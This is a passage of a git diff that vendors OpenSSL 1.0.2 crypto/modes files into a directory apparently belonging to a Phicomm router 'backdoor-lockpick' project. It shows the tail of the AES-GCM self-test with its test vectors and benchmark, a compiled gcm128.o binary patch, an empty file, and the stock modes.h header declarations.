+    0x2e, 0x4c, 0x30, 0x3d, 0x8a, 0x31, 0x8a, 0x72,
+    0x1c, 0x3c, 0x0c, 0x95, 0x95, 0x68, 0x09, 0x53,
+    0x2f, 0xcf, 0x0e, 0x24, 0x49, 0xa6, 0xb5, 0x25,
+    0xb1, 0x6a, 0xed, 0xf5, 0xaa, 0x0d, 0xe6, 0x57,
+    0xba, 0x63, 0x7b, 0x39
+};
+
+static const u8 A16[] = {
+    0xfe, 0xed, 0xfa, 0xce, 0xde, 0xad, 0xbe, 0xef,
+    0xfe, 0xed, 0xfa, 0xce, 0xde, 0xad, 0xbe, 0xef,
+    0xab, 0xad, 0xda, 0xd2
+};
+
+static const u8 C16[] = {
+    0x52, 0x2d, 0xc1, 0xf0, 0x99, 0x56, 0x7d, 0x07,
+    0xf4, 0x7f, 0x37, 0xa3, 0x2a, 0x84, 0x42, 0x7d,
+    0x64, 0x3a, 0x8c, 0xdc, 0xbf, 0xe5, 0xc0, 0xc9,
+    0x75, 0x98, 0xa2, 0xbd, 0x25, 0x55, 0xd1, 0xaa,
+    0x8c, 0xb0, 0x8e, 0x48, 0x59, 0x0d, 0xbb, 0x3d,
+    0xa7, 0xb0, 0x8b, 0x10, 0x56, 0x82, 0x88, 0x38,
+    0xc5, 0xf6, 0x1e, 0x63, 0x93, 0xba, 0x7a, 0x0a,
+    0xbc, 0xc9, 0xf6, 0x62
+};
+
+static const u8 T16[] = {
+    0x76, 0xfc, 0x6e, 0xce, 0x0f, 0x4e, 0x17, 0x68,
+    0xcd, 0xdf, 0x88, 0x53, 0xbb, 0x2d, 0x55, 0x1b
+};
+
+/* Test Case 17 */
+# define K17 K16
+# define P17 P16
+# define A17 A16
+static const u8 IV17[] = { 0xca, 0xfe, 0xba, 0xbe, 0xfa, 0xce, 0xdb, 0xad };
+
+static const u8 C17[] = {
+    0xc3, 0x76, 0x2d, 0xf1, 0xca, 0x78, 0x7d, 0x32,
+    0xae, 0x47, 0xc1, 0x3b, 0xf1, 0x98, 0x44, 0xcb,
+    0xaf, 0x1a, 0xe1, 0x4d, 0x0b, 0x97, 0x6a, 0xfa,
+    0xc5, 0x2f, 0xf7, 0xd7, 0x9b, 0xba, 0x9d, 0xe0,
+    0xfe, 0xb5, 0x82, 0xd3, 0x39, 0x34, 0xa4, 0xf0,
+    0x95, 0x4c, 0xc2, 0x36, 0x3b, 0xc7, 0x3f, 0x78,
+    0x62, 0xac, 0x43, 0x0e, 0x64, 0xab, 0xe4, 0x99,
+    0xf4, 0x7c, 0x9b, 0x1f
+};
+
+static const u8 T17[] = {
+    0x3a, 0x33, 0x7d, 0xbf, 0x46, 0xa7, 0x92, 0xc4,
+    0x5e, 0x45, 0x49, 0x13, 0xfe, 0x2e, 0xa8, 0xf2
+};
+
+/* Test Case 18 */
+# define K18 K17
+# define P18 P17
+# define A18 A17
+static const u8 IV18[] = {
+    0x93, 0x13, 0x22, 0x5d, 0xf8, 0x84, 0x06, 0xe5,
+    0x55, 0x90, 0x9c, 0x5a, 0xff, 0x52, 0x69, 0xaa,
+    0x6a, 0x7a, 0x95, 0x38, 0x53, 0x4f, 0x7d, 0xa1,
+    0xe4, 0xc3, 0x03, 0xd2, 0xa3, 0x18, 0xa7, 0x28,
+    0xc3, 0xc0, 0xc9, 0x51, 0x56, 0x80, 0x95, 0x39,
+    0xfc, 0xf0, 0xe2, 0x42, 0x9a, 0x6b, 0x52, 0x54,
+    0x16, 0xae, 0xdb, 0xf5, 0xa0, 0xde, 0x6a, 0x57,
+    0xa6, 0x37, 0xb3, 0x9b
+};
+
+static const u8 C18[] = {
+    0x5a, 0x8d, 0xef, 0x2f, 0x0c, 0x9e, 0x53, 0xf1,
+    0xf7, 0x5d, 0x78, 0x53, 0x65, 0x9e, 0x2a, 0x20,
+    0xee, 0xb2, 0xb2, 0x2a, 0xaf, 0xde, 0x64, 0x19,
+    0xa0, 0x58, 0xab, 0x4f, 0x6f, 0x74, 0x6b, 0xf4,
+    0x0f, 0xc0, 0xc3, 0xb7, 0x80, 0xf2, 0x44, 0x45,
+    0x2d, 0xa3, 0xeb, 0xf1, 0xc5, 0xd8, 0x2c, 0xde,
+    0xa2, 0x41, 0x89, 0x97, 0x20, 0x0e, 0xf8, 0x2e,
+    0x44, 0xae, 0x7e, 0x3f
+};
+
+static const u8 T18[] = {
+    0xa4, 0x4a, 0x82, 0x66, 0xee, 0x1c, 0x8e, 0xb0,
+    0xc8, 0xb5, 0xd4, 0xcf, 0x5a, 0xe9, 0xf1, 0x9a
+};
+
+/* Test Case 19 */
+# define K19 K1
+# define P19 P1
+# define IV19 IV1
+# define C19 C1
+static const u8 A19[] = {
+    0xd9, 0x31, 0x32, 0x25, 0xf8, 0x84, 0x06, 0xe5,
+    0xa5, 0x59, 0x09, 0xc5, 0xaf, 0xf5, 0x26, 0x9a,
+    0x86, 0xa7, 0xa9, 0x53, 0x15, 0x34, 0xf7, 0xda,
+    0x2e, 0x4c, 0x30, 0x3d, 0x8a, 0x31, 0x8a, 0x72,
+    0x1c, 0x3c, 0x0c, 0x95, 0x95, 0x68, 0x09, 0x53,
+    0x2f, 0xcf, 0x0e, 0x24, 0x49, 0xa6, 0xb5, 0x25,
+    0xb1, 0x6a, 0xed, 0xf5, 0xaa, 0x0d, 0xe6, 0x57,
+    0xba, 0x63, 0x7b, 0x39, 0x1a, 0xaf, 0xd2, 0x55,
+    0x52, 0x2d, 0xc1, 0xf0, 0x99, 0x56, 0x7d, 0x07,
+    0xf4, 0x7f, 0x37, 0xa3, 0x2a, 0x84, 0x42, 0x7d,
+    0x64, 0x3a, 0x8c, 0xdc, 0xbf, 0xe5, 0xc0, 0xc9,
+    0x75, 0x98, 0xa2, 0xbd, 0x25, 0x55, 0xd1, 0xaa,
+    0x8c, 0xb0, 0x8e, 0x48, 0x59, 0x0d, 0xbb, 0x3d,
+    0xa7, 0xb0, 0x8b, 0x10, 0x56, 0x82, 0x88, 0x38,
+    0xc5, 0xf6, 0x1e, 0x63, 0x93, 0xba, 0x7a, 0x0a,
+    0xbc, 0xc9, 0xf6, 0x62, 0x89, 0x80, 0x15, 0xad
+};
+
+static const u8 T19[] = {
+    0x5f, 0xea, 0x79, 0x3a, 0x2d, 0x6f, 0x97, 0x4d,
+    0x37, 0xe6, 0x8e, 0x0c, 0xb8, 0xff, 0x94, 0x92
+};
+
+/* Test Case 20 */
+# define K20 K1
+# define A20 A1
+/* this results in 0xff in counter LSB */
+static const u8 IV20[64] = { 0xff, 0xff, 0xff, 0xff };
+
+static const u8 P20[288];
+static const u8 C20[] = {
+    0x56, 0xb3, 0x37, 0x3c, 0xa9, 0xef, 0x6e, 0x4a,
+    0x2b, 0x64, 0xfe, 0x1e, 0x9a, 0x17, 0xb6, 0x14,
+    0x25, 0xf1, 0x0d, 0x47, 0xa7, 0x5a, 0x5f, 0xce,
+    0x13, 0xef, 0xc6, 0xbc, 0x78, 0x4a, 0xf2, 0x4f,
+    0x41, 0x41, 0xbd, 0xd4, 0x8c, 0xf7, 0xc7, 0x70,
+    0x88, 0x7a, 0xfd, 0x57, 0x3c, 0xca, 0x54, 0x18,
+    0xa9, 0xae, 0xff, 0xcd, 0x7c, 0x5c, 0xed, 0xdf,
+    0xc6, 0xa7, 0x83, 0x97, 0xb9, 0xa8, 0x5b, 0x49,
+    0x9d, 0xa5, 0x58, 0x25, 0x72, 0x67, 0xca, 0xab,
+    0x2a, 0xd0, 0xb2, 0x3c, 0xa4, 0x76, 0xa5, 0x3c,
+    0xb1, 0x7f, 0xb4, 0x1c, 0x4b, 0x8b, 0x47, 0x5c,
+    0xb4, 0xf3, 0xf7, 0x16, 0x50, 0x94, 0xc2, 0x29,
+    0xc9, 0xe8, 0xc4, 0xdc, 0x0a, 0x2a, 0x5f, 0xf1,
+    0x90, 0x3e, 0x50, 0x15, 0x11, 0x22, 0x13, 0x76,
+    0xa1, 0xcd, 0xb8, 0x36, 0x4c, 0x50, 0x61, 0xa2,
+    0x0c, 0xae, 0x74, 0xbc, 0x4a, 0xcd, 0x76, 0xce,
+    0xb0, 0xab, 0xc9, 0xfd, 0x32, 0x17, 0xef, 0x9f,
+    0x8c, 0x90, 0xbe, 0x40, 0x2d, 0xdf, 0x6d, 0x86,
+    0x97, 0xf4, 0xf8, 0x80, 0xdf, 0xf1, 0x5b, 0xfb,
+    0x7a, 0x6b, 0x28, 0x24, 0x1e, 0xc8, 0xfe, 0x18,
+    0x3c, 0x2d, 0x59, 0xe3, 0xf9, 0xdf, 0xff, 0x65,
+    0x3c, 0x71, 0x26, 0xf0, 0xac, 0xb9, 0xe6, 0x42,
+    0x11, 0xf4, 0x2b, 0xae, 0x12, 0xaf, 0x46, 0x2b,
+    0x10, 0x70, 0xbe, 0xf1, 0xab, 0x5e, 0x36, 0x06,
+    0x87, 0x2c, 0xa1, 0x0d, 0xee, 0x15, 0xb3, 0x24,
+    0x9b, 0x1a, 0x1b, 0x95, 0x8f, 0x23, 0x13, 0x4c,
+    0x4b, 0xcc, 0xb7, 0xd0, 0x32, 0x00, 0xbc, 0xe4,
+    0x20, 0xa2, 0xf8, 0xeb, 0x66, 0xdc, 0xf3, 0x64,
+    0x4d, 0x14, 0x23, 0xc1, 0xb5, 0x69, 0x90, 0x03,
+    0xc1, 0x3e, 0xce, 0xf4, 0xbf, 0x38, 0xa3, 0xb6,
+    0x0e, 0xed, 0xc3, 0x40, 0x33, 0xba, 0xc1, 0x90,
+    0x27, 0x83, 0xdc, 0x6d, 0x89, 0xe2, 0xe7, 0x74,
+    0x18, 0x8a, 0x43, 0x9c, 0x7e, 0xbc, 0xc0, 0x67,
+    0x2d, 0xbd, 0xa4, 0xdd, 0xcf, 0xb2, 0x79, 0x46,
+    0x13, 0xb0, 0xbe, 0x41, 0x31, 0x5e, 0xf7, 0x78,
+    0x70, 0x8a, 0x70, 0xee, 0x7d, 0x75, 0x16, 0x5c
+};
+
+static const u8 T20[] = {
+    0x8b, 0x30, 0x7f, 0x6b, 0x33, 0x28, 0x6d, 0x0a,
+    0xb0, 0x26, 0xa9, 0xed, 0x3f, 0xe1, 0xe8, 0x5f
+};
+
+# define TEST_CASE(n)    do {                                    \
+        u8 out[sizeof(P##n)];                                   \
+        AES_set_encrypt_key(K##n,sizeof(K##n)*8,&key);          \
+        CRYPTO_gcm128_init(&ctx,&key,(block128_f)AES_encrypt);  \
+        CRYPTO_gcm128_setiv(&ctx,IV##n,sizeof(IV##n));          \
+        memset(out,0,sizeof(out));                              \
+        if (A##n) CRYPTO_gcm128_aad(&ctx,A##n,sizeof(A##n));    \
+        if (P##n) CRYPTO_gcm128_encrypt(&ctx,P##n,out,sizeof(out));     \
+        if (CRYPTO_gcm128_finish(&ctx,T##n,16) ||               \
+            (C##n && memcmp(out,C##n,sizeof(out))))             \
+                ret++, printf ("encrypt test#%d failed.\n",n);  \
+        CRYPTO_gcm128_setiv(&ctx,IV##n,sizeof(IV##n));          \
+        memset(out,0,sizeof(out));                              \
+        if (A##n) CRYPTO_gcm128_aad(&ctx,A##n,sizeof(A##n));    \
+        if (C##n) CRYPTO_gcm128_decrypt(&ctx,C##n,out,sizeof(out));     \
+        if (CRYPTO_gcm128_finish(&ctx,T##n,16) ||               \
+            (P##n && memcmp(out,P##n,sizeof(out))))             \
+                ret++, printf ("decrypt test#%d failed.\n",n);  \
+        } while(0)
+
+int main()
+{
+    GCM128_CONTEXT ctx;
+    AES_KEY key;
+    int ret = 0;
+
+    TEST_CASE(1);
+    TEST_CASE(2);
+    TEST_CASE(3);
+    TEST_CASE(4);
+    TEST_CASE(5);
+    TEST_CASE(6);
+    TEST_CASE(7);
+    TEST_CASE(8);
+    TEST_CASE(9);
+    TEST_CASE(10);
+    TEST_CASE(11);
+    TEST_CASE(12);
+    TEST_CASE(13);
+    TEST_CASE(14);
+    TEST_CASE(15);
+    TEST_CASE(16);
+    TEST_CASE(17);
+    TEST_CASE(18);
+    TEST_CASE(19);
+    TEST_CASE(20);
+
+# ifdef OPENSSL_CPUID_OBJ
+    {
+        size_t start, stop, gcm_t, ctr_t, OPENSSL_rdtsc();
+        union {
+            u64 u;
+            u8 c[1024];
+        } buf;
+        int i;
+
+        AES_set_encrypt_key(K1, sizeof(K1) * 8, &key);
+        CRYPTO_gcm128_init(&ctx, &key, (block128_f) AES_encrypt);
+        CRYPTO_gcm128_setiv(&ctx, IV1, sizeof(IV1));
+
+        CRYPTO_gcm128_encrypt(&ctx, buf.c, buf.c, sizeof(buf));
+        start = OPENSSL_rdtsc();
+        CRYPTO_gcm128_encrypt(&ctx, buf.c, buf.c, sizeof(buf));
+        gcm_t = OPENSSL_rdtsc() - start;
+
+        CRYPTO_ctr128_encrypt(buf.c, buf.c, sizeof(buf),
+                              &key, ctx.Yi.c, ctx.EKi.c, &ctx.mres,
+                              (block128_f) AES_encrypt);
+        start = OPENSSL_rdtsc();
+        CRYPTO_ctr128_encrypt(buf.c, buf.c, sizeof(buf),
+                              &key, ctx.Yi.c, ctx.EKi.c, &ctx.mres,
+                              (block128_f) AES_encrypt);
+        ctr_t = OPENSSL_rdtsc() - start;
+
+        printf("%.2f-%.2f=%.2f\n",
+               gcm_t / (double)sizeof(buf),
+               ctr_t / (double)sizeof(buf),
+               (gcm_t - ctr_t) / (double)sizeof(buf));
+#  ifdef GHASH
+        {
+            void (*gcm_ghash_p) (u64 Xi[2], const u128 Htable[16],
+                                 const u8 *inp, size_t len) = ctx.ghash;
+
+            GHASH((&ctx), buf.c, sizeof(buf));
+            start = OPENSSL_rdtsc();
+            for (i = 0; i < 100; ++i)
+                GHASH((&ctx), buf.c, sizeof(buf));
+            gcm_t = OPENSSL_rdtsc() - start;
+            printf("%.2f\n", gcm_t / (double)sizeof(buf) / (double)i);
+        }
+#  endif
+    }
+# endif
+
+    return ret;
+}
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/modes/gcm128.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/modes/gcm128.o
new file mode 100644
index 0000000000000000000000000000000000000000..3d84ed3ed58ed9c67ea97641eea9621e2eae098a
GIT binary patch
literal 7984
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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/modes/lib b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/modes/lib
new file mode 100644
index 0000000..e69de29
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/modes/modes.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/modes/modes.h
new file mode 100644
index 0000000..fd48849
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/modes/modes.h
@@ -0,0 +1,163 @@
+/* ====================================================================
+ * Copyright (c) 2008 The OpenSSL Project. All rights reserved.
+ *
+ * Rights for redistribution and usage in source and binary
+ * forms are granted according to the OpenSSL license.
+ */
+
+#include <stddef.h>
+
+#ifdef  __cplusplus
+extern "C" {
+#endif
+typedef void (*block128_f) (const unsigned char in[16],
+                            unsigned char out[16], const void *key);
+
+typedef void (*cbc128_f) (const unsigned char *in, unsigned char *out,
+                          size_t len, const void *key,
+                          unsigned char ivec[16], int enc);
+
+typedef void (*ctr128_f) (const unsigned char *in, unsigned char *out,
+                          size_t blocks, const void *key,
+                          const unsigned char ivec[16]);
+
+typedef void (*ccm128_f) (const unsigned char *in, unsigned char *out,
+                          size_t blocks, const void *key,
+                          const unsigned char ivec[16],
+                          unsigned char cmac[16]);
+
+void CRYPTO_cbc128_encrypt(const unsigned char *in, unsigned char *out,
+                           size_t len, const void *key,
+                           unsigned char ivec[16], block128_f block);
+void CRYPTO_cbc128_decrypt(const unsigned char *in, unsigned char *out,
+                           size_t len, const void *key,
+                           unsigned char ivec[16], block128_f block);
+
+void CRYPTO_ctr128_encrypt(const unsigned char *in, unsigned char *out,
+                           size_t len, const void *key,
+                           unsigned char ivec[16],
+                           unsigned char ecount_buf[16], unsigned int *num,
+                           block128_f block);
+
+void CRYPTO_ctr128_encrypt_ctr32(const unsigned char *in, unsigned char *out,
+                                 size_t len, const void *key,
+                                 unsigned char ivec[16],
+                                 unsigned char ecount_buf[16],
+                                 unsigned int *num, ctr128_f ctr);
+
+void CRYPTO_ofb128_encrypt(const unsigned char *in, unsigned char *out,
+                           size_t len, const void *key,
+                           unsigned char ivec[16], int *num,
+                           block128_f block);
+
+void CRYPTO_cfb128_encrypt(const unsigned char *in, unsigned char *out,
+                           size_t len, const void *key,
+                           unsigned char ivec[16], int *num,
+                           int enc, block128_f block);
+void CRYPTO_cfb128_8_encrypt(const unsigned char *in, unsigned char *out,
+                             size_t length, const void *key,
+                             unsigned char ivec[16], int *num,
+                             int enc, block128_f block);
+void CRYPTO_cfb128_1_encrypt(const unsigned char *in, unsigned char *out,
+                             size_t bits, const void *key,
+                             unsigned char ivec[16], int *num,
+                             int enc, block128_f block);
+
+size_t CRYPTO_cts128_encrypt_block(const unsigned char *in,
+                                   unsigned char *out, size_t len,
+                                   const void *key, unsigned char ivec[16],
+                                   block128_f block);
+size_t CRYPTO_cts128_encrypt(const unsigned char *in, unsigned char *out,
+                             size_t len, const void *key,
+                             unsigned char ivec[16], cbc128_f cbc);
+size_t CRYPTO_cts128_decrypt_block(const unsigned char *in,
+                                   unsigned char *out, size_t len,
+                                   const void *key, unsigned char ivec[16],
+                                   block128_f block);
+size_t CRYPTO_cts128_decrypt(const unsigned char *in, unsigned char *out,
+                             size_t len, const void *key,
+                             unsigned char ivec[16], cbc128_f cbc);
+
+size_t CRYPTO_nistcts128_encrypt_block(const unsigned char *in,
+                                       unsigned char *out, size_t len,
+                                       const void *key,
+                                       unsigned char ivec[16],
+                                       block128_f block);
+size_t CRYPTO_nistcts128_encrypt(const unsigned char *in, unsigned char *out,
+                                 size_t len, const void *key,
+                                 unsigned char ivec[16], cbc128_f cbc);
+size_t CRYPTO_nistcts128_decrypt_block(const unsigned char *in,
+                                       unsigned char *out, size_t len,
+                                       const void *key,
+                                       unsigned char ivec[16],
+                                       block128_f block);
+size_t CRYPTO_nistcts128_decrypt(const unsigned char *in, unsigned char *out,
+                                 size_t len, const void *key,
+                                 unsigned char ivec[16], cbc128_f cbc);
+
+typedef struct gcm128_context GCM128_CONTEXT;
+
+GCM128_CONTEXT *CRYPTO_gcm128_new(void *key, block128_f block);
+void CRYPTO_gcm128_init(GCM128_CONTEXT *ctx, void *key, block128_f block);
+void CRYPTO_gcm128_setiv(GCM128_CONTEXT *ctx, const unsigned char *iv,
+                         size_t len);
+int CRYPTO_gcm128_aad(GCM128_CONTEXT *ctx, const unsigned char *aad,
+                      size_t len);
+int CRYPTO_gcm128_encrypt(GCM128_CONTEXT *ctx,
+                          const unsigned char *in, unsigned char *out,
+                          size_t len);
+int CRYPTO_gcm128_decrypt(GCM128_CONTEXT *ctx,
+                          const unsigned char *in, unsigned char *out,
+                          size_t len);
+int CRYPTO_gcm128_encrypt_ctr32(GCM128_CONTEXT *ctx,
+                                const unsigned char *in, unsigned char *out,
+                                size_t len, ctr128_f stream);
